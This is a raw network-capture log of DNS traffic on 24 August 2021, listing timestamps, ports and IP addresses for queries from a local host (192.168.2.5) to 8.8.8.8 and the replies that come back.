Aug 24, 2021 08:50:25.165453911 CEST	53	64650	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:25.418519020 CEST	52633	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:25.548114061 CEST	53	52633	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:25.575556040 CEST	56124	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:25.581531048 CEST	55552	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:25.610085011 CEST	53	56124	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:25.610239029 CEST	53	55552	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:25.758476019 CEST	60813	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:25.787254095 CEST	53	60813	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:26.210776091 CEST	50930	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:26.366565943 CEST	53	50930	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:26.374999046 CEST	51582	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:26.378180027 CEST	56831	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:26.415275097 CEST	53	56831	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:26.426172018 CEST	56981	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:26.429332972 CEST	63599	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:26.462959051 CEST	53	63599	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:26.496258974 CEST	53	56981	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:26.529014111 CEST	53	51582	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:26.684026957 CEST	61009	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:26.691909075 CEST	57676	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:26.715910912 CEST	53	61009	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:26.716201067 CEST	53	57676	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:26.872741938 CEST	50687	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:26.898152113 CEST	53	50687	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:27.251828909 CEST	53246	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:27.283968925 CEST	53	53246	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:27.389827967 CEST	60242	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:27.414362907 CEST	53	60242	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:27.902877092 CEST	49674	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:27.927194118 CEST	53	49674	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:28.413779020 CEST	50811	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:28.420677900 CEST	64331	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:28.445089102 CEST	53	64331	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:28.446034908 CEST	53	50811	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:28.620604038 CEST	56789	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:28.644973993 CEST	53	56789	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:28.919440985 CEST	63680	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:28.941972017 CEST	59706	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:28.954024076 CEST	53	63680	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:28.974446058 CEST	53	59706	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:29.057137966 CEST	51986	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:29.057187080 CEST	55029	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:29.081422091 CEST	53	51986	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:29.089202881 CEST	53	55029	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:29.114187956 CEST	64913	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:29.141433954 CEST	53	64913	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:29.233160973 CEST	58438	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:29.257543087 CEST	53	58438	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:29.315186024 CEST	49414	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:29.339508057 CEST	53	49414	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:29.412137032 CEST	61135	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:29.439513922 CEST	53	61135	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:29.559374094 CEST	49373	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:29.608716965 CEST	53	49373	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:29.617393970 CEST	59258	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:29.650110960 CEST	53	59258	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:29.870552063 CEST	52434	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:29.897804022 CEST	53	52434	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:29.900129080 CEST	56456	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:29.925276041 CEST	53	56456	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:29.944555998 CEST	53715	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:29.969885111 CEST	53	53715	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:30.124557972 CEST	60677	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:30.151765108 CEST	53	60677	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:30.373868942 CEST	59658	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:30.398192883 CEST	53	59658	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:30.889666080 CEST	56873	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:30.890913963 CEST	51402	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:30.916832924 CEST	53	51402	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:30.924529076 CEST	53	56873	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:31.091092110 CEST	61487	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:31.121467113 CEST	53	61487	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:31.407361984 CEST	59026	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:31.431984901 CEST	53	59026	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:31.595455885 CEST	58616	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:31.634017944 CEST	53	58616	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:31.785685062 CEST	49232	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:31.822931051 CEST	53	49232	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:31.932807922 CEST	55390	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:31.960125923 CEST	53	55390	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:31.970391989 CEST	61057	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:32.002609015 CEST	53	61057	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:32.047660112 CEST	62975	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:32.087798119 CEST	53	62975	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:32.199481964 CEST	62623	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:32.209659100 CEST	60626	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:32.220057964 CEST	64199	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:32.226581097 CEST	53	62623	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:32.244999886 CEST	53	60626	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:32.247431993 CEST	53	64199	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:32.434247017 CEST	64289	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:32.469598055 CEST	53	64289	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:32.478622913 CEST	63509	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:32.502990007 CEST	53	63509	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:32.511399984 CEST	62707	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:32.543368101 CEST	53	62707	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:32.698288918 CEST	60328	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:32.726190090 CEST	51927	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:32.730554104 CEST	53	60328	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:32.754404068 CEST	53	51927	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:32.784117937 CEST	62279	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:32.809864998 CEST	53	62279	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:32.979613066 CEST	58156	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:33.004069090 CEST	53	58156	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:33.144861937 CEST	61329	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:33.187997103 CEST	53	61329	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:33.238317013 CEST	55689	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:33.267563105 CEST	56804	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:33.269794941 CEST	53	55689	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:33.306334019 CEST	53	56804	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:33.527729034 CEST	59651	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:33.562576056 CEST	53	59651	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:33.776555061 CEST	54342	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:33.808640957 CEST	53	54342	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:33.902678013 CEST	62853	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:33.928390026 CEST	53	62853	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:33.986948967 CEST	55957	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:34.011214972 CEST	53	55957	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:34.088365078 CEST	56417	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:34.112529993 CEST	53	56417	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:34.183233023 CEST	63649	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:34.210572958 CEST	53	63649	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:34.261573076 CEST	63385	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:34.285887003 CEST	53	63385	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:34.372997046 CEST	57985	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:34.400055885 CEST	53	57985	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:34.448451996 CEST	53746	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:34.472815990 CEST	53	53746	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:34.554095030 CEST	63772	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:34.586380959 CEST	53	63772	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:34.742611885 CEST	53339	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:34.766714096 CEST	53	53339	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:34.916769981 CEST	64282	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:34.943918943 CEST	53	64282	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:35.081829071 CEST	60790	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:35.117022038 CEST	65223	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:35.117078066 CEST	53	60790	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:35.141614914 CEST	53	65223	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:35.312891006 CEST	61463	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:35.341007948 CEST	53	61463	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:35.431225061 CEST	57450	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:35.463296890 CEST	53	57450	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:35.534604073 CEST	59162	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:35.534651041 CEST	61752	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:35.559724092 CEST	53	61752	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:35.570003986 CEST	53	59162	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:35.633820057 CEST	64745	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:35.668752909 CEST	53	64745	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:35.693396091 CEST	50720	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:35.717680931 CEST	53	50720	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:35.798140049 CEST	58046	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:35.822523117 CEST	53	58046	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:36.012530088 CEST	50299	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:36.036793947 CEST	53	50299	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:36.226320028 CEST	51951	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:36.226341009 CEST	55037	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:36.260627985 CEST	53	55037	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:36.268771887 CEST	53	51951	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:36.484687090 CEST	50823	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:36.484719992 CEST	52439	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:36.484726906 CEST	65003	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:36.512042999 CEST	53	50823	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:36.520122051 CEST	53	65003	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:36.525882006 CEST	53	52439	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:36.665970087 CEST	62613	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:36.690504074 CEST	53	62613	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:36.856040955 CEST	61280	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:36.888252974 CEST	53	61280	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:37.157428980 CEST	56205	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:37.181705952 CEST	53	56205	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:37.197433949 CEST	51129	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:37.221741915 CEST	53	51129	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:37.402955055 CEST	56571	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:37.430032015 CEST	53	56571	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:37.629743099 CEST	62923	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:37.653947115 CEST	53	62923	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:37.711592913 CEST	64231	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:37.738598108 CEST	53	64231	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:37.816807985 CEST	53021	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:37.844057083 CEST	53	53021	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:37.874589920 CEST	56546	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:37.906641006 CEST	53	56546	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:37.967529058 CEST	64112	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:37.982805014 CEST	64254	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:38.001396894 CEST	53	64112	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:38.006917953 CEST	53	64254	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:38.121366024 CEST	63226	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:38.148485899 CEST	53	63226	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:38.256477118 CEST	55746	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:38.283700943 CEST	53	55746	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:38.368125916 CEST	50459	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:38.395282030 CEST	53	50459	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:38.557352066 CEST	52789	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:38.576062918 CEST	54396	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:38.581823111 CEST	53	52789	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:38.827568054 CEST	52929	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:38.854696989 CEST	53	52929	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:39.001534939 CEST	53	54396	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:39.082673073 CEST	62682	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:39.109817982 CEST	53	62682	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:39.272731066 CEST	63287	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:39.273247004 CEST	54561	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:39.297785997 CEST	53	54561	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:39.304930925 CEST	53	63287	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:39.501307964 CEST	54241	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:39.501646042 CEST	54694	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:39.527085066 CEST	53	54241	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:39.528821945 CEST	53	54694	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:39.755686045 CEST	59529	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:39.782854080 CEST	53	59529	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:40.034544945 CEST	57609	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:40.058829069 CEST	53	57609	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:40.148189068 CEST	56901	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:40.173688889 CEST	53	56901	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:40.326544046 CEST	49284	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:40.361799955 CEST	53	49284	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:40.443996906 CEST	52266	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:40.471122980 CEST	53	52266	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:40.937634945 CEST	59227	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:40.938416004 CEST	58369	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:40.962706089 CEST	53	58369	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:40.964728117 CEST	53	59227	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:40.971956015 CEST	61315	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:41.003957987 CEST	53	61315	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:41.107162952 CEST	58287	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:41.134438992 CEST	53	58287	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:41.262835026 CEST	56207	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:41.288347006 CEST	53	56207	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:41.469037056 CEST	50843	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:41.488382101 CEST	50946	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:41.493309021 CEST	53	50843	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:41.515767097 CEST	53	50946	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:41.638618946 CEST	61217	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:41.673382044 CEST	51502	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:41.698302031 CEST	53	51502	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:41.834208965 CEST	53	61217	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:42.417434931 CEST	59557	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:42.462306976 CEST	53	59557	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:42.517242908 CEST	58902	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:42.541585922 CEST	53	58902	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:42.549803019 CEST	49637	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:42.574522972 CEST	53	49637	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:42.604552984 CEST	63961	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:42.629853964 CEST	53	63961	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:42.706449032 CEST	62420	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:42.741570950 CEST	53	62420	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:43.115542889 CEST	64375	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:43.143335104 CEST	53	64375	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:44.381138086 CEST	61811	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:44.381243944 CEST	64375	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:44.408365011 CEST	53	61811	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:44.408394098 CEST	53	64375	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:44.664772034 CEST	56775	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:44.666179895 CEST	62877	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:44.689294100 CEST	53	56775	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:44.696369886 CEST	53	62877	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:44.969388962 CEST	62081	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:45.003446102 CEST	53	62081	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:45.088242054 CEST	55668	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:45.124842882 CEST	53	55668	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:45.262898922 CEST	55470	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:45.301238060 CEST	53	55470	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:45.479252100 CEST	58891	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:45.519933939 CEST	53	58891	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:45.683912039 CEST	61620	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:45.708118916 CEST	53	61620	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:45.796402931 CEST	65266	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:45.822762012 CEST	53	65266	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:45.952060938 CEST	50727	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:45.979129076 CEST	53	50727	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:46.040869951 CEST	55843	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:46.065320015 CEST	53	55843	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:46.171343088 CEST	59191	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:46.197743893 CEST	53	59191	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:46.239006996 CEST	60700	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:46.266362906 CEST	53	60700	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:46.385284901 CEST	53817	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:46.409661055 CEST	53	53817	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:46.526756048 CEST	54343	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:46.551393986 CEST	53	54343	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:46.672616005 CEST	54958	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:46.699656010 CEST	53	54958	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:46.751758099 CEST	51703	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:46.776031971 CEST	53	51703	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:46.814610004 CEST	53883	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:46.817854881 CEST	61609	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:46.820250988 CEST	58590	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:46.840603113 CEST	53	53883	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:46.844666958 CEST	53	58590	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:46.849885941 CEST	53	61609	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:47.044411898 CEST	50959	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:47.044644117 CEST	50623	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:47.060112000 CEST	51493	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:47.068999052 CEST	53	50623	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:47.069834948 CEST	53	50959	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:47.084439993 CEST	53	51493	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:47.102274895 CEST	54297	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:47.129564047 CEST	53	54297	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:47.205157042 CEST	64318	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:47.239658117 CEST	60610	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:47.241079092 CEST	53	64318	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:47.263972044 CEST	53	60610	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:47.270205021 CEST	54336	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:47.288330078 CEST	49766	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:47.305551052 CEST	53	54336	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:47.315576077 CEST	53	49766	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:47.334748030 CEST	58628	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:47.336463928 CEST	64379	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:47.337136030 CEST	51721	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:47.362435102 CEST	53	64379	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:47.362606049 CEST	53	51721	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:47.366909981 CEST	53	58628	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:47.503272057 CEST	64996	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:47.528080940 CEST	53	64996	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:47.568339109 CEST	53949	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:47.603532076 CEST	53	53949	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:47.663434029 CEST	52193	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:47.687764883 CEST	53	52193	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:47.703046083 CEST	55652	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:47.730357885 CEST	53	55652	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:48.034344912 CEST	50638	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:48.089860916 CEST	53	50638	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:48.182600021 CEST	58730	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:48.217833996 CEST	53	58730	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:48.266407967 CEST	50958	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:48.270207882 CEST	56396	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:48.297303915 CEST	53	56396	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:48.387979984 CEST	53	50958	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:48.465672970 CEST	59714	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:48.492959023 CEST	53	59714	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:48.698364019 CEST	50401	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:48.717617989 CEST	61389	53	192.168.2.5	8.8.8.8
